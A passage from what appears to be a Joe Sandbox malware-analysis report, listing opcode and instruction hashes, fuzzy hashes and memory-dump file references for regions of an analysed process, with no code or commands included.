                                                                                                                                    • Instruction ID: 8e071c47a73b589626a11ed47b4ae5de0543cb083a9f89e1f42bad84c56b20bc
                                                                                                                                    • Opcode Fuzzy Hash: 92729382008f01731ed0f3a022329951a15473e739d85a2b7bbb80f74b8879ef
                                                                                                                                    • Instruction Fuzzy Hash: 0AF09030A15A4E9FEB60EF58C8486EE77A1FF64704F010036E41CC21A0DAB062908B80
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000026.00000002.2206775874.00007FFD9BAB5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB5000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_38_2_7ffd9bab5000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 3134fcc554d0516bb68dc3845485f5a453e296b74328dc3ac1f000720adfd1ee
                                                                                                                                    • Instruction ID: d780d78e3a3c2d9cc597a603950f727c4b417ac5288c18a4a27606d6d22f49dc
                                                                                                                                    • Opcode Fuzzy Hash: 3134fcc554d0516bb68dc3845485f5a453e296b74328dc3ac1f000720adfd1ee
                                                                                                                                    • Instruction Fuzzy Hash: 17F09A31608A8DCFCB95EF8CC891ADA3FA0FF29300F0501A5E518C7162D7B4E9A4CB81
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000026.00000002.2206775874.00007FFD9BAE9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE9000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_38_2_7ffd9bae9000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 02c02c09d3cd9aef7a93f52552581907ff8c328b5f01c4f966af8d523bc721ef
                                                                                                                                    • Instruction ID: 0ba353f719700d688700cec9ff334dcffdbe3b6d1e33aa10ec680a3b69508848
                                                                                                                                    • Opcode Fuzzy Hash: 02c02c09d3cd9aef7a93f52552581907ff8c328b5f01c4f966af8d523bc721ef
                                                                                                                                    • Instruction Fuzzy Hash: 14F0BD3091494DDFDF84EF58C458AAA7BF1FB68305F10419AA41DD3160DB71A694CB80
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000026.00000002.2206775874.00007FFD9BAB5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB5000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_38_2_7ffd9bab5000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 21b1b4ef42fa06e85fabd238672aa1cc7511190daa2ff9e830c3cbf310c96c4c
                                                                                                                                    • Instruction ID: b5ab72fde972c4976b6d9f8351bf9e5f356f0c13b6cc5ea55de72dc8c85797ee
                                                                                                                                    • Opcode Fuzzy Hash: 21b1b4ef42fa06e85fabd238672aa1cc7511190daa2ff9e830c3cbf310c96c4c
                                                                                                                                    • Instruction Fuzzy Hash: 88F0903190868DCFCF91EF18C855A993BE0FF19300F0501AAE41CC7162D774E964CB81
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000026.00000002.2206775874.00007FFD9BAB5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB5000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_38_2_7ffd9bab5000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 0e957744cb8f6c1ce7e1691131e4395d9d4808570bedc8bc4b7d05ea09b098e9
                                                                                                                                    • Instruction ID: d9494fc31439dd1bdca4f25b8b2daa64883e372002a7baccecb14f0f314f7faf
                                                                                                                                    • Opcode Fuzzy Hash: 0e957744cb8f6c1ce7e1691131e4395d9d4808570bedc8bc4b7d05ea09b098e9
                                                                                                                                    • Instruction Fuzzy Hash: C2F08C3195E28C9FDB51ABA8886C6ECBFB0EF15301F4504AAE458C60A2EA349254CB02
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000026.00000002.2206775874.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_38_2_7ffd9baa0000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 51e55b1649dd0dcec18c850f60dac779f09d5e67d42e0ba577eeb9683bad4686
                                                                                                                                    • Instruction ID: e671d6f21ad19e038b6d7663604e1cf21b6b8665a854fcf24f45d7e1f7b8d5ca
                                                                                                                                    • Opcode Fuzzy Hash: 51e55b1649dd0dcec18c850f60dac779f09d5e67d42e0ba577eeb9683bad4686
                                                                                                                                    • Instruction Fuzzy Hash: 29F03730D1594E9FDB90EF64C8496FE77E0FF14304F41457AE81CD2160DA70A6A4CB81
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000026.00000002.2206775874.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_38_2_7ffd9baa0000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a7b6554ab0acc6668de119c683133ccb2c4a84babae0ff0eeac88a1a20671aa9
                                                                                                                                    • Instruction ID: 80e82419ad6511794f8c009530631b459697f0cfd2027e96cc4f6eb99d117c66
                                                                                                                                    • Opcode Fuzzy Hash: a7b6554ab0acc6668de119c683133ccb2c4a84babae0ff0eeac88a1a20671aa9
                                                                                                                                    • Instruction Fuzzy Hash: 5FE0B630B066194FE768DA48D8A0AEA66A1AB44394F5042F5A00D9659ACA742E858F80